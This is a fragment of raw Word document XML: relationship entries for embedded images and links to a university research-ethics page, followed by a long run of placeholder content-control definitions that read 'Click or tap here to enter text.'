Target="media/image61.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><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png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId15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61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><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image" Target="media/image20.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.uwtsd.ac.uk/research/research-ethics/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId174" Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><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image" Target="media/image16.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\c.lohmann-hancock\AppData\Local\Microsoft\Windows\INetCache\REICoP-17-20-v3-Final.pdf" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId15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image" Target="media/image7.jpeg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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2A9045DA3DF43B29FB200131625196B"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{06376EF1-A658-48B3-B73F-765C71DB0FB1}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="13AF5044F8CA46BE887C695480ED10BC"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{6CC8C115-4E5D-4AFC-A326-492E04D09EDC}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="13AF5044F8CA46BE887C695480ED10BC"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="076EDDCD79DE44DC93936E0E0EBCA221"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{AD556764-30D0-44FA-82DD-4B7F855B95F4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="076EDDCD79DE44DC93936E0E0EBCA221"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="A0997C5AEE394EB78893892DCA3BF135"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{B04E072D-0F65-49DC-80C4-661C6CCC8281}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="A0997C5AEE394EB78893892DCA3BF135"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="FEA8D09E1C4743D19BEC2A3CB6996E41"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C9AFE982-7A1A-4F79-8745-027A4FE7B69E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="FEA8D09E1C4743D19BEC2A3CB6996E41"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3E6AB743BD494E82A65780FF864B8B24"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{B2C551A8-9503-4959-B191-4815D1D6843B}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="3E6AB743BD494E82A65780FF864B8B24"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="A20C4381D955412C8FEA095412BE9874"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{FA27BF6E-24CC-4599-AE4B-56C1FA67AF9D}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="A20C4381D955412C8FEA095412BE9874"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="B02B0417302F46CF840AA81FCE2E1164"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{F2F1DE5E-7384-4FC3-90BF-0CC162C7453A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="B02B0417302F46CF840AA81FCE2E1164"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="D2A63D841D5A4D2EB247EF9EB874CDC3"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{850CFDD4-D877-46BE-822C-BD6F304E0A4C}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="D2A63D841D5A4D2EB247EF9EB874CDC3"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="48F06C37D8854FEB813217324E35AF3E"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{FCE8875B-8BAD-45C9-AB2B-5DA17E0AB79F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="48F06C37D8854FEB813217324E35AF3E"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="DD64B62FC8A3449DBC54D5F97F94B8F7"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{E9A4B424-B9A0-4F75-9A3A-9DEF0F1DD153}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="DD64B62FC8A3449DBC54D5F97F94B8F7"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="7062C0D66EAB4637A9228847C47DC609"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{F296D104-DB27-499B-B70E-E7CEDBD409FC}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="7062C0D66EAB4637A9228847C47DC609"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="AB865B082A684B71B56E518D83400D43"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{267D5AF3-E48F-42C4-A8D7-5ECD0797DDFA}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="AB865B082A684B71B56E518D83400D43"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="BF89F913C6E64BD2BCE84E30B2F33962"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{DE16C633-21A4-4A44-9B76-33CC3B65BD14}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="BF89F913C6E64BD2BCE84E30B2F33962"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3E30850FF7494E1BA617BD213F21BEA3"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{651A0712-9C23-4A21-A71B-9482AFF05BCA}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="3E30850FF7494E1BA617BD213F21BEA3"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="B1606384D4D54B2E9BA3699B5781FEE6"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{B2C801D8-CDF9-4AA5-98BF-10CD18404F75}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="B1606384D4D54B2E9BA3699B5781FEE6"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="6EE7B9725F55459BB751C023024BB54F"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C7F53629-BB44-4CB9-894A-BBDF684FDCA3}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="6EE7B9725F55459BB751C023024BB54F"/>
          </w:pPr>
          <w:r w:rsidRPr="00EF23D8">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="35708180EB364F1AB30F61C866E192B5"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{4A5D5093-9023-401E-97D2-104AC6EE575E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="35708180EB364F1AB30F61C866E192B5"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="5E8209F0A4E64F608BE4C52D1B5B2B09"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C71F10E8-4199-46E3-9867-C130D17C05DA}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="5E8209F0A4E64F608BE4C52D1B5B2B09"/>
          </w:pPr>
          <w:r w:rsidRPr="00D74DD3">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="2D43A7A42F0F46D38176B46BFDEC3D2D"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{35E710D5-9B6C-4236-9D07-ECE3529667F9}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D64605" w:rsidRDefault="007729BC" w:rsidP="007729BC">
          <w:pPr>
            <w:pStyle w:val="2D43A7A42F0F46D38176B46BFDEC3D2D"/>
          </w:pPr>
          <w:r w:rsidRPr="00C74C84">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="B4968CCAFF454D81A20E29BBF44F45F0"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{32AC1E34-C49A-41A3-8E6A-AD05107BCDE0}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00DD4250" w:rsidRDefault="00D64605" w:rsidP="00D64605">
          <w:pPr>
            <w:pStyle w:val="B4968CCAFF454D81A20E29BBF44F45F0"/>
          </w:pPr>
          <w:r w:rsidRPr="00C74C84">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2A60DAA2-C8FC-47BA-B6F4-4BFC073A8832}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250">
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
